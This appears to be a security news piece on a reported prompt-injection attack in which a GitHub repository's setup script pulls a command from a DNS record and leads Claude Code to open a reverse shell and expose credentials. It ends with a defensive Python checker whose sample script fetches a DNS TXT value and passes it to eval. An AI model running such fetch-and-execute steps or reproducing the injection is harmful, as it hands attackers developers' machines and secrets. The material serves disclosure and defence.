Vulnerable Claude Code: Compromised GitHub Repository Takes Control

Security researchers from 0DIN, Mozilla's GenAI bug bounty platform, have discovered a new attack vector targeting developers' machines. Through a seemingly normal GitHub repository, attackers can gain full control via an indirect prompt injection as soon as someone uses an AI coding tool like Claude Code.
A configuration script in the repository retrieves a command from a DNS record at runtime and executes it. The malicious code never actually exists in the repository itself, making it invisible to scanners, code reviews, and the AI agent. Claude Code encounters a routine error message during setup, automatically executes the script, and opens a reverse shell to the attacker. From there, the attacker can retrieve API keys and login credentials while maintaining persistent access. A simple link to a repository in a job offer, a tutorial, or a Slack message is enough to compromise anyone who opens it with an AI coding tool.
The solution, according to the researchers: AI agents should display the content of a configuration script before executing it. Additionally, developers should treat configuration instructions in third-party repositories as untrusted code.
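One way to apply both recommendations before a configuration script runs, as an added example that is not code from 0DIN or from Claude Code: a heuristic reviewer that renders the script for a human and marks lines where DNS resolver output reaches an execution sink. The function names, the lists of lookup tools and sinks, and the sample script are assumptions made for the illustration.

```python
import re

# Heuristic patterns; the tool list and sink list are assumptions of this example.
DNS_LOOKUP = re.compile(r"\b(?:dig|nslookup|host|drill|kdig)\s+\S")
EXEC_SINK = re.compile(
    r"\beval\b"                              # eval "$x"
    r"|(?<![\w./])(?:ba|z|da)?sh\s+-c\b"     # sh -c "$x"
    r"|\|\s*(?:ba|z|da)?sh\b"                # ... | sh
    r'|^"?\$\{?\w+'                          # bare "$x" used as a command
)
ASSIGN = re.compile(r"^(?:export\s+|local\s+)?([A-Za-z_]\w*)=")


def review_setup_script(text):
    """Return [(line_no, line)] where DNS-derived data reaches an execution sink."""
    tainted, findings = set(), []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # A line is DNS-derived if it calls a resolver or reads a tainted variable.
        from_dns = bool(DNS_LOOKUP.search(line)) or any(
            re.search(r"\$\{?%s\b" % re.escape(v), line) for v in tainted
        )
        m = ASSIGN.match(line)
        if m and from_dns:
            tainted.add(m.group(1))  # variable now carries resolver output
        if from_dns and EXEC_SINK.search(line):
            findings.append((no, line))
    return findings


def show_before_run(text):
    """Render the script for human review, marking flagged lines with '!!'."""
    flagged = {no for no, _ in review_setup_script(text)}
    return "\n".join(
        "%s %3d | %s" % ("!!" if no in flagged else "  ", no, l)
        for no, l in enumerate(text.splitlines(), 1)
    )


# Constructed sample; setup.example.invalid is a placeholder name.
SAMPLE = """#!/bin/sh
pip install -r requirements.txt
cfg=$(dig +short TXT setup.example.invalid)
step=$(echo "$cfg" | tr -d '"')
eval "$step"
"""

if __name__ == "__main__":
    print(show_before_run(SAMPLE))
```

A clean result from a pattern check like this does not make a third-party script trusted; it only highlights the one flow described above, so the rendered script still needs to be read before anything executes.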